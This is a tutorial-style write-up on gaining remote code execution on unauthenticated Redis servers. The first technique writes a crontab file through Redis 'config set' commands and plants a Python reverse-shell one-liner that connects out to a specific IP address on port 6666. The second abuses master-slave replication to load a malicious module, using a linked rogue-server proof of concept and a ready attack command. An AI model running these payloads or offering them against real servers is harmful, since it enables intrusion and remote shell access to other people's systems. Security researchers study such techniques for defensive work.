Redis 基于主从复制的 RCE 利用方式

At the WCTF2019 Final ended on July 7, 2019, Pavel Toporkov, a member of LC/BC, introduced a new version of RCE usage method about redis at the sharing session. This usage method is more general and more harmful than the previous usage method. Let’s start from the previous usage method to talk about redis usage issues.

https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

通过写入文件 GetShell

Unauthorized redis will cause GetShell, which is used as follows:

1

2

3

4

5

6

7

8

127.0.0.1:6379 config set dir /var/spool/cron/crontabs

OK

127.0.0.1:6379 config set dbfilename root

OK

127.0.0.1:6379 get 1

'\n* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'IP\',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);'\n'

127.0.0.1:6379 save

OK

This method is done by writing files to getShell. The main problem with this method is that the data saved by redis is not simple json or csv, so the file written will have a large amount of useless data, similar to

1

2

3

[padding]

* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'115.28.78.16\',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);'

[padding]

This kind of files mainly utilizes crontab, ssh key, webshell and other files have certain fault tolerance. In addition, crontab and ssh services can be said to be standard services for the server. Therefore, in the past, this getshell method by writing files can basically be said to be very easy to kill.

However, with the continuous development of modern service deployment methods, componentization has become an inevitable trend. Docker is one of the products of this trend. In this deployment model, there will be no services other than redis in a single container, including ssh and crontab. In addition, the strict control of permissions, it is difficult to getshell by writing files alone. In this case, we need other means of exploitation.

通过主从复制 GetShell

Redis 主从复制

Redis is an open source, network-based, memory-based, optional persistence-based key-value pair storage database written in ANSI C. However, if the data is stored in a single Redis instance, when the read and write volume is relatively large, the server will be difficult to bear. To cope with this situation, Redis provides master-slave mode. Master-slave mode refers to using a redis instance as the host and other instances are used as backup machines. The data of the host and slave are the same, while the slave is only responsible for reading and the host is only responsible for writing. The pressure of traffic can be greatly reduced through reading and writing separation, which is considered a way to relieve efficiency by sacrificing space.

Use two dockers to do the test:

1

docker search redis5

1

docker pull damonevking/redis5.0

1

docker ps

The master-slave state can be set through slaveof

First set on slave:

Then set it on master:

On slave, you can find that the data has been synchronized:

Redis 模块

After understanding master-slave synchronization, we also need to have some understanding of the redis module.

After Reids 4.x, Redis has added module functions. Through external expansion, a new Redis command can be implemented in redis, and .so files can be compiled by writing in C language.

Code to write malicious so files

https://github.com/RicterZ/RedisModules-ExecuteCommand

After git clone, enter the directory and use the make command to compile it to obtain the .so library file.

利用原理

When two Redis instances set master-slave mode, the Redis host instance can synchronize files to the slave via FULLRESYNC. Then load the so file on the slave machine and we can execute the new command to expand.

漏洞复现

Use a simulated malicious server as the host and simulates fullresync requests.

https://github.com/LoRexxar/redis-rogue-server

(Note: The author used the python3.7 environment to execute successfully)

Then enable docker for redis 5.0

Then directly attack the server through POC

1

python3 redis-rogue-server.py --rhost 172.18.0.2 --rport 6379 --lhost 172.18.0.1

(Note: There will be problems when rebounding the shell in the docker environment, so the lhost in this article uses the intranet IP of the docker host. The author will pop up an error when using the external network IP)